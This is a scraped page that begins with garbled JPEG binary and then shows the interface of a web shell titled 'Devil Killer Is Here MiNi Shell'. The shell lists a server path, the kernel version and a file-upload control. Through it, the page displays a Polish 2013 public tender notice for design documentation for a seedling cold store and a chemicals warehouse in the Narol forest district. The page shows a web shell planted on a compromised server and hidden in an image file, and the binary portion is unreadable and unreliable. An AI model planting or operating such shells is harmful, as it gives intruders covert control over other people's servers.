JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130115/8587-N-2013.html

<p class="kh_header"><b>Narol: Opracowanie dokumentacji techniczno - projektowej na budowę chłodni na sadzonki oraz magazynu na środki chemiczne w Nadleśnictwie Narol</b><br>
<b>Numer ogłoszenia: 8587 - 2013; data zamieszczenia: 15.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Narol , ul. Bohaterów Września 1939 roku 38, 37-610 Narol, woj. podkarpackie, tel. 016 6317020, faks 016 6317020.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji techniczno - projektowej na budowę chłodni na sadzonki oraz magazynu na środki chemiczne w Nadleśnictwie Narol.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Opracowanie dokumentacji techniczno - projektowej na budowę chłodni na sadzonki oraz magazynu na środki chemiczne, które ze względów organizacyjnych podzielono na 2 części:
Część I: Opracowanie dokumentacji techniczno - projektowej na Budowę chłodni na sadzonki w szkółce leśnej w Łówczy.
Opis: Zakres prac obejmuje: 
weryfikacja koncepcji Nadleśnictwa dotyczącej lokalizacji i parametrów projektowanej do budowy chłodni na sadzonki, 
opracowanie dokumentacji techniczno - projektowej chłodni na sadzonki - podstawowe parametry: budynek parterowy, konstrukcja ścian żelbetowa, ściany zewnętrzne do wysokości ok. 2 - 2.5 m obsypane ziemią, izolacje przeciwwilgociowe (poziome i pionowe), izolacje cieplne (poziome i pionowe), dach dwuspadowy o kącie pochylenia ok. 40 - 45 stopni, wymiary: długość ok. 25m, szerokość ok. 12 m, 2 bramy wjazdowe umieszczone na całej długości chłodni (wschód - zachód), wysokość bram wjazdowych umożliwiająca wjazd ciągnikiem rolniczym ze sprzętem rolniczym-przyczepą. W budynku należy zlokalizować: chłodnię kontenerową na nasiona, sadzonki-kubatura ok. 16.5 m2 z agregatem zasilanym prądem elektrycznym oraz pomieszczenie gospodarcze-kubatura ok. 16.5 m2. Przewidywane jest dołowanie sadzonek w gruncie, chłodzenie na całości agregatem zasilanym prądem elektrycznym. Projektowane instalacje: elektryczna 220V i 380V, sanitarna-woda do celów gospodarczych, wentylacyjna -grawitacyjna, wymuszona. Zaprojektowanie utwardzonych dojazdów do, w i wokół chłodni.
Projekt chłodni na sadzonki obejmuje: 
projekt budowlany, sporządzony zgodnie z art.34, ust.3 ustawy z dnia 7 lipca 1994 r. Prawo budowlane-Dz. U. z 2010r.. nr 243poz. 1623 z późn. zm. oraz Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowego zakresu i formy projektu budowlanego-Dz.U. z 2003 r. nr 120 poz. 1133 z późn. zm.
projekt wykonawczy.
przedmiar robót zawierający szczegółowe zestawienie przewidzianych do wykonania robót w kolejności technologicznej, ich wykonania wraz ze szczegółowym ich opisem, wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót. 
specyfikacja techniczna wykonania i odbioru robót budowlanych zawierająca zbiory wymagań.
szczegółowy kosztorys inwestorski opracowany zgodnie z wytycznymi zawartymi w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowania kosztów robót budowlanych określonych w programie funkcjonalno użytkowym-Dz. U. z 2004 r. nr 130, poz. 1389 z późn. zm.
kosztorysy nakładcze-ślepe opracowane na podstawie kosztorysu inwestorskiego.
informacja BIOZ.
usytuowanie obiektu na mapie sytuacyjnej w skali 1:500.
Dodatkowe warunki dotyczące przedmiotu zamówienia w zakresie dokumentacji projektowej:
dokumentacja nie może wskazywać nazw własnych, konkretnych technologii, patentów, produktów, itp.
Wykonawca przenosi na Zamawiającego wszelkie prawa autorskie oraz prawa zależne związane z dokumentacją projektową.
dokumentację należy wykonać w pięciu egzemplarzach w formie papierowej i jednym w formie elektronicznej na płytach CD w formatach - dla plików tekstowych DOC oraz dla plików nieedytowalnych w formacie PDF niezbędnych do zamieszczenia opracowania na stronie internetowej.
  
Część II: Opracowanie dokumentacji techniczno - projektowej na Budowę magazynu na środki chemiczne w szkółce leśnej w Łówczy.
  
Opis: Zakres prac obejmuje: 
weryfikacja koncepcji Nadleśnictwa dotyczącej lokalizacji i parametrów projektowanego do budowy magazynu na środki chemiczne, 
opracowanie dokumentacji techniczno - projektowej magazynu na środki chemiczne - podstawowe parametry: budynek parterowy, ławy żelbetowe, konstrukcja ścian z bloczków ceramicznych lub betonowych, izolacje przeciwwilgociowe-poziome i pionowe, izolacje cieplne-poziome i pionowe, stolarka okienna i drzwiowa, dach dwuspadowy, wymiary: długość ok. 10 m, szerokość ok. 6 m. W budynku magazynu należy zlokalizować: pomieszczenie gospodarcze-kubatura ok. 30 m2. Projektowane instalacje: elektryczna, sanitarna, wentylacyjna, grzewcza. 
Projekt magazynu na środki chemiczne obejmuje: 
projekt budowlany, sporządzony zgodnie z art.34, ust.3 ustawy z dnia 7 lipca 1994 r. Prawo budowlane-Dz. U. z 2010r.. nr 243poz. 1623 z późn. zm. oraz Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowego zakresu i formy projektu budowlanego-Dz.U. z 2003 r. nr 120 poz. 1133 z późn. zm.
projekt wykonawczy.
przedmiar robót zawierający szczegółowe zestawienie przewidzianych do wykonania robót w kolejności technologicznej, ich wykonania wraz ze szczegółowym ich opisem, wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót. 
specyfikacja techniczna wykonania i odbioru robót budowlanych zawierająca zbiory wymagań.
szczegółowy kosztorys inwestorski opracowany zgodnie z wytycznymi zawartymi w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowania kosztów robót budowlanych określonych w programie funkcjonalno użytkowym-Dz. U. z 2004 r. nr 130, poz. 1389 z późn. zm.
kosztorysy nakładcze -ślepe opracowanena podstawie kosztorysu inwestorskiego.
informacja BIOZ.
usytuowanie obiektu na mapie sytuacyjnej w skali 1:500.

Dodatkowe warunki dotyczące przedmiotu zamówienia w zakresie dokumentacji projektowej:
dokumentacja projektowa winna spełniać wymagania określone w Rozporządzeniu Ministra Rolnictwa i Rozwoju Wsi z dnia 24 czerwca 2002 r. w sprawie bezpieczeństwa i higieny pracy przy stosowaniu i magazynowaniu środków ochrony roślin oraz nawozów mineralnych i mineralno - organicznych -Dz.U. z dnia 4 lipca 2002 r.,
dokumentacja nie może wskazywać nazw własnych, konkretnych technologii, patentów, produktów, itp.
Wykonawca przenosi na Zamawiającego wszelkie prawa autorskie oraz prawa zależne związane z dokumentacją projektową.
dokumentację należy wykonać w pięciu egzemplarzach w formie papierowej i jednym w formie elektronicznej na płytach CD w formatach - dla plików tekstowych DOC oraz dla plików nieedytowalnych w formacie PDF niezbędnych do zamieszczenia opracowania na stronie internetowej.

Wszelkie koszty opracowania ponosi wykonawca -np. opłaty skarbowe do wniosków o wydanie decyzji, pozwoleń, za pełnomocnictwa, wypisy, wyrysy, mapy itp. Całą dokumentację projektowo - kosztorysową wraz ze sporządzonymi wnioskami, uzyskanymi: postanowieniami, opiniami, uzgodnieniami, decyzjami, pozwoleniami itp. -oryginały lub kopie potwierdzone za zgodność z oryginałem, Wykonawca przekaże Zamawiającemu w terminie realizacji zamówienia.

Miejsce realizacji zamówienia -lokalizacja:
adres administracyjny: województwo podkarpackie, powiat lubaczowski , gmina Narol, obręb ewidencyjny: Łówcza, dz. ew. nr 1382, 1385, 1387.
adres leśny: RDLP Krosno, Nadleśnictwo Narol, Leśnictwo Łówcza.

Szczegółową lokalizację projektowanych do wykonania zadań przedstawia załącznik  graficzny nr 2.

Dla wszystkich powyżej wymienionych części Zamawiający posiada:
mapy sytuacyjno - wysokościowe do celów projektowych.                                                                   

Wykonawca zobowiązuje się wykonać dokumentację projektową w postaci opracowania dla powyższego zakresu wraz ze wszystkimi wymaganymi prawem administracyjnym decyzjami, pozwoleniami i uzgodnieniami, w tym również ostatecznym pozwoleniem na budowę.

W ramach pełnienia nadzoru autorskiego, w całym czasie trwania budowy obowiązkiem
Wykonawcy będzie stwierdzenie w toku wykonywania robót budowlanych zgodności
realizacji z projektem.

Wykonawca pełnić będzie nadzór autorski według potrzeb wynikających z postępu robót, jednak nie rzadziej niż raz na miesiąc oraz na każde wezwanie Zamawiającego, dokonane telefonicznie lub faxem, na 3 dni przed oczekiwanym pobytem. Nadzór autorski sprawowany będzie od dnia rozpoczęcia robót budowlanych do ich zakończenia i oddania do użytkowania, celem stwierdzenia zgodności realizacji robót z projektem, wyjaśnianie wątpliwości dotyczących projektu i ewentualne uzupełnienie szczegółów dokumentacji projektowej oraz czuwanie, by zakres wprowadzonych zmian nie spowodował istotnej zmiany zatwierdzonego projektu budowlanego, wymagającej uzyskania nowego pozwolenia na budowę. Uzgadnianie możliwości wprowadzania rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego.

Wykonawca zobowiązuje się do należytej współpracy z Zamawiającym oraz podmiotami, którym zostanie powierzone wykonanie projektu tak, aby zapewnić prawidłową i terminową realizację, w tym w szczególności do uzgadniania możliwości wprowadzania rozwiązań zamiennych zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego.

Zamawiający zastrzega sobie prawo uzgadniania projektu tj. co najmniej dwukrotne spotkanie Wykonawcy - Projektanta z przedstawicielem Nadleśnictwa celem konsultacji rozwiązań projektowych. Spotkania odbywać się będą w biurze Nadleśnictwa w uzgodnionym terminie. 

Wykonawca jest zobowiązany udzielić na wykonaną dokumentację projektowo - kosztorysową rękojmi i gwarancji na okres minimum 12 miesięcy obejmującą odpowiedzialność za niekompletność opracowania objętego umową lub rozwiązania projektu lub za niezgodność z obowiązującymi przepisami i normami. Rękojmia liczona jest od dnia całkowitego końcowego odbioru robót budowlanych.

Wykonawca występuje o wydanie niezbędnych uzgodnień, opinii, pozwoleń i decyzji
na potrzeby przedmiotu zamówienia na podstawie pełnomocnictwa udzielonego przez
Zamawiającego - wzór pełnomocnictwa stanowi załącznik nr 6 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 i 7 ustawy PZP (Dz.U. z 2010 r. Nr 113, poz. 759, z późn. zm.)  do wysokości 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w następującej wysokości:                                    - dla Części I - 100,00 zł. (słownie: sto złotych),                                                                               - dla Części II - 100, 00 zł. (słownie: sto złotych), które wnosi się przed upływem terminu składania ofert (art. 45 ust. 2,3 i 4 Ustawy).
Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zm.), art. 45 ust.6 Ustawy.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w: PKO BP Lubaczów 47102042870000280200614925 , z dopiskiem na blankiecie przelewu jakiego postępowania dotyczy. (art. 45 ust.7 Ustawy). 
Wadium wnoszone w formach, o których mowa w pkt. 12.2 ppkt. 2-5 SIWZ, należy złożyć w formie oryginału w kasie Zamawiającego. 
Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Ustawy.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie składania ofert znajdzie się na rachunku bankowym Zamawiającego, tj. do dnia 24.01.2013r. do godz. 10.00.
Wykonawca, który nie wniesie wadium w terminie składania ofert w jednej z form, o których mowa w pkt. 12.2., zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą (art. 24 ust. 2 pkt. 2, art. 24 ust. 4 Ustawy).
Na podstawie art. 46 Ustawy, Zamawiający zwróci wadium:
1)	wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy,
2)	wykonawcy, którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy,
3)	niezwłocznie, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający zatrzymuje wadium wraz z odsetkami (art. 46 ust. 4a i 5 Ustawy), jeżeli wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,
4)	Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nielezących po jego stronie.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 12.8.1), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w zakresie posiadania uprawnień do wykonywania przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonał usługę projektową charakterem odpowiadającą przedmiotowi zamówienia (projekty budowy, przebudowy lub remontów budynków) o wartości nie niższej niż: 
- dla części I - 10 000.  00 zł. (dziesięć tysięcy złotych),
- dla części II - 8 000. 00 zł (osiem tysięcy złotych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w zakresie dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek w zakresie dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej: jedną osoba do projektowania z uprawnieniami w specjalności konstrukcyjno - budowlanej bez ograniczeń, określone przepisami ustawy Prawo budowlane (Dz.U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) lub odpowiadające im uprawnienia budowlane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej Zamawiający uzna za spełniony, jeżeli wykonawca wykaże, że:
1) 	posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż                 - dla części I - 10 000.  00 zł. (dziesięć tysięcy złotych),
-	dla części II - 8 000. 00 zł (osiem tysięcy złotych). 
2)  jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia - na kwotę co najmniej 
- dla części I - 300 000.  00 zł. (trzysta tysięcy złotych),
- dla części II - 150 000. 00 zł (sto pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

